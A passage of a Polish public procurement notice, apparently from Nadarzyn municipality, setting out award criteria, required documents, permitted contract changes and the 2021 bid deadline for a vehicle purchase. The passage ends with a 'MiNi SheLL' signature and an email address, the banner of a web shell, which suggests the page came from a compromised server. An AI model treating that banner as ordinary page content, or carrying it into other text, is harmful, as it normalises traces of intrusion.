wymagania kryterialne przypisana zostanie proporcjonalnie mniejsza liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku, zgodnie z regułą matematyczną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości i rekojmi za wady obejmujący stan mechaniczny pojazdu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 2.	W ramach przedmiotowych środków dowodowych, Wykonawca wraz z ofertą złoży następujące dokumenty:<br/>1)	kopię świadectwa homologacji typu lub świadectwa zgodności WE; <br/>2)	prospekty, dane serwisowe. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	kopia świadectwa homologacji typu lub świadectwa zgodności WE; <br/>2)	prospekty, dane serwisowe. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta musi zawierać:<br/>1) Formularz Oferty - załącznik nr 1 do niniejszej SWZ;<br/>2) oświadczenie o braku podstaw do wykluczenia z postępowania - załącznik nr 2 do SWZ;<br/>3) stosowne Pełnomocnictwo(a) – w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z dokumentu rejestracyjnego – załącznik Wykonawcy;<br/>4) kopia świadectwa homologacji typu lub świadectwa zgodności WE – załącznik Wykonawcy;<br/>5) prospekty, dane serwisowe – załącznik Wykonawcy;<br/>6) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia publicznego – załącznik Wykonawcy;<br/>7) Opis techniczny przedmiotu zamówienia – wymagania techniczne, których spełnianie potwierdza Wykonawca – załącznik nr 4. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmianę umowy w zakresie wskazanym w art. 455 ust. 1 ustawy Prawo zamówień publicznych, a także w zakresie zmiany terminu realizacji przedmiotu zamówienia, w sytuacji gdy:<br/>1)	zaistnieją okoliczności mające wpływ na prawidłową realizację umowy, w szczególności jeżeli zmiana terminu realizacji nie będzie zmianą niekorzystną dla Zamawiającego;<br/>2)	wpłynie odwołanie i wstrzymana zostanie procedura;<br/>3)	zaistnieje siła wyższa;<br/>4)	konieczność zmiany terminu spowodowana jest stanem epidemii albo zagrożenia epidemiologicznego, np. w związku z COVID-19;<br/>5)	nastąpiła okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, albo zaistnieje okoliczność leżąca po stronie Zamawiającego, w szczególności spowodowana sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi.<br/>2.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.<br/>3.	Strona umowy występująca z propozycją zmiany umowy powinna wskazać konieczność lub korzystne aspekty wprowadzenia takiej zmiany pod względem ekonomicznym technicznym czy też finansowym. Stronie po otrzymaniu propozycji przysługuje 7 – dniowy termin na ustosunkowanie się. Upływ ww. terminu jest jednoznaczny z odmową wprowadzenia zmian do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-23 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://nadarzyn.ezamawiajacy.pl, w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-23 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1) cena oferty brutto;<br/>2) okres gwarancji jakości i rękojmi za wady, obejmującej stan mechaniczny pojazdu.

Creat By MiNi SheLL
Email: jattceo@gmail.com